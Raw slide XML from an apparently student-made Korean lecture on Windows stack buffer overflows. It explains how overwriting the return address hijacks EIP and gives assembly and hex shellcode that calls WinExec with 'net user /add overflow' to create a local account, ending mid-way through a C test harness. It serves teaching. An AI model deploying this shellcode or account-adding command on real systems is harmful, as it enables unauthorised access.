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9" r:id="rId9"/>
    <p:sldId id="263" r:id="rId10"/>
    <p:sldId id="264" r:id="rId11"/>
    <p:sldId id="265" r:id="rId12"/>
    <p:sldId id="270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71E2AD-86FE-4A55-819D-F75B86D15DE5}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2010-09-29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944424D-2F5F-49A7-BFD1-4826E6163A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인제대학교 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>컴퓨터 공학부</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>05 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>이승현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 Windows BOF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sz="3800" dirty="0" smtClean="0"/>
              <a:t>Return Address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3800" dirty="0" smtClean="0"/>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3800" dirty="0" err="1" smtClean="0"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3800" dirty="0" smtClean="0"/>
              <a:t>변수 끝에서 오른쪽 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3800" dirty="0" smtClean="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3800" dirty="0" smtClean="0"/>
              <a:t>바이트</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3800" dirty="0" smtClean="0"/>
              <a:t>(SFP)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3800" dirty="0" smtClean="0"/>
              <a:t> 떨어진 부분에 위치</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3800" dirty="0" smtClean="0"/>
              <a:t>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========================================================== </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>[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(512)] [SFP(4)] [Ret Address] </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>==========================================================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fgets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호출된 이후의 메모리 구조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========================================================== </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>[&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>사용자의 입력</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>&gt;] [SFP] [Ret Address] </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>========================================================== </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pP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영문자는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자에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바이트를 차지하므로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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>변수의 크기만큼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>512byte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>만큼을 채우고 그다음 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>SFP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>가 차지하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는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>4byte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>만큼 덮어쓰게 되면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>516byte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차지하게 되고 그 다음에 존재하는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Return Address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>까지가 변경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된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>.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⊙ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>fgets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 이후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>변수의 길이가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보다 클시에 생기는 메모리 구조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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Address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0575" y="5286388"/>
          <a:ext cx="4952995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49790"/>
                <a:gridCol w="2286968"/>
                <a:gridCol w="758118"/>
                <a:gridCol w="758119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latin typeface="Britannic Bold" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>buf</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:latin typeface="Britannic Bold" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t> 512</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:latin typeface="Britannic Bold" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>이하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Britannic Bold" pitchFamily="34" charset="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latin typeface="Britannic Bold" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>buf</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:latin typeface="Britannic Bold" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:latin typeface="Britannic Bold" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>512</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:latin typeface="Britannic Bold" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>]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Britannic Bold" pitchFamily="34" charset="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latin typeface="Britannic Bold" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>SFP[4]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Britannic Bold" pitchFamily="34" charset="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latin typeface="Britannic Bold" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>RET[4]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Britannic Bold" pitchFamily="34" charset="0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latin typeface="Britannic Bold" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>Buf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ritannic Bold" pitchFamily="34" charset="0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latin typeface="Britannic Bold" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>512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Britannic Bold" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>초과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Britannic Bold" pitchFamily="34" charset="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latin typeface="Britannic Bold" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>buf</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:latin typeface="Britannic Bold" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:latin typeface="Britannic Bold" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>512</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:latin typeface="Britannic Bold" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>]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Britannic Bold" pitchFamily="34" charset="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latin typeface="Britannic Bold" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>buf</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:latin typeface="Britannic Bold" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>[516]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Britannic Bold" pitchFamily="34" charset="0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latin typeface="Britannic Bold" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>buf</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:latin typeface="Britannic Bold" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>[520]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Britannic Bold" pitchFamily="34" charset="0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Address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143116"/>
            <a:ext cx="7715304" cy="11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1357298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/>
              <a:t>이전에 설명 했던 대로라면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>516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로 채우고 다음 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>4byte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‘B’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  채우면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시에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>EIP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“42424242”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>가 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44" y="3357562"/>
            <a:ext cx="586740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그룹 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4357686" y="5000636"/>
            <a:ext cx="4643438" cy="1785950"/>
            <a:chOff x="4500562" y="4857760"/>
            <a:chExt cx="4643438" cy="178595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23465" y="4857760"/>
              <a:ext cx="4620535" cy="174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4500562" y="6357958"/>
              <a:ext cx="1428760" cy="285752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꺾인 연결선 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6357950" y="4214818"/>
            <a:ext cx="1428760" cy="785818"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 10019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43012"/>
            <a:ext cx="8258204" cy="542914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WinExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>(“net user /add overflow”);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0076" y="357166"/>
            <a:ext cx="7972452" cy="100013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로컬 공격을 위한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" dirty="0" err="1" smtClean="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>작성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785926"/>
            <a:ext cx="378621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100" dirty="0" smtClean="0"/>
              <a:t>어셈블리어로 작성된 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>WinExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>함수 호출</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" smtClean="0"/>
              <a:t>push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" smtClean="0"/>
              <a:t>push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" smtClean="0"/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ebp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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>xor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edi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edi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" smtClean="0"/>
              <a:t>push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>edi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DWORD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" smtClean="0"/>
              <a:t>[ebp-05h], 0x776f6c66 //wolf</a:t>
            </a:r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DWORD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" smtClean="0"/>
              <a:t>[ebp-09h], 0x7265766f //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>revo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" smtClean="0"/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DWORD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" smtClean="0"/>
              <a:t>[ebp-0dh], 0x20646461 // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>dda</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" smtClean="0"/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DWORD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" smtClean="0"/>
              <a:t>[ebp-11h], 0x2f207265 /// re</a:t>
            </a:r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DWORD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" smtClean="0"/>
              <a:t>[ebp-15h], 0x73752074 //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" smtClean="0"/>
              <a:t> t</a:t>
            </a:r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byte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" smtClean="0"/>
              <a:t>[ebp-16h], 65h         //e</a:t>
            </a:r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byte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" smtClean="0"/>
              <a:t>[ebp-17h], 6eh         //n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sub </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" smtClean="0"/>
              <a:t>, 14h		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" smtClean="0"/>
              <a:t>push 05h</a:t>
            </a:r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edi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esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" smtClean="0"/>
              <a:t>add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>edi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" smtClean="0"/>
              <a:t>, 5</a:t>
            </a:r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dword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ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" smtClean="0"/>
              <a:t>[ebp-20h], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>edi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" smtClean="0"/>
              <a:t>sub </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>edi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" smtClean="0"/>
              <a:t>, 9	</a:t>
            </a:r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esp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edi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p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eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" smtClean="0"/>
              <a:t>, 0x7C86114D           //call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>WinExec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" smtClean="0"/>
              <a:t>call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" smtClean="0"/>
              <a:t>pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>esp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000628" y="1818396"/>
            <a:ext cx="40719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 err="1" smtClean="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>로 작성된 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>WinExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>함수 호출</a:t>
            </a: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"\x54\x55\x8B\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>xEC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>\x33\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>xFF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>\x57\xC7\x45”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>“\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>xFB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>\x66\x6C\x6F\x77\xC7\x45\xF7\x6F”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>“\x76\x65\x72\xC7\x45\xF3\x61\x64\x64”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>“\x20\xC7\x45\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>xEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>\x65\x72\x20\x2F\xC7”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>“\x45\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>xEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>\x74\x20\x75\x73\xC6\x45\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>xEA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“\x65\xC6\x45\xE9\x6E\x83\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>xEC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>\x14\x6A”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>“\x05\x8B\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>xFC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>\x83\xC7\x05\x89\x7D\xE0”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>“\x83\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>xEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>\x09\x8B\xE7\xB8\x4D\x11\x86”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>“\x7C\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>xFF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>\xD0\xB8\xA2\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>xCA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>\x81\x7C\x33”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>“\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>xFF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>\x57\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>xFF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>\xD0”</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="오른쪽 화살표 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4000496" y="3857628"/>
            <a:ext cx="928694" cy="50006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28596" y="1142984"/>
            <a:ext cx="8258204" cy="5143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200" dirty="0" smtClean="0"/>
              <a:t>====================== </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>소스 코드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callshell.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> ======================</a:t>
            </a:r>
          </a:p>
          <a:p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stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>&gt;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unsigned char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>[]=</a:t>
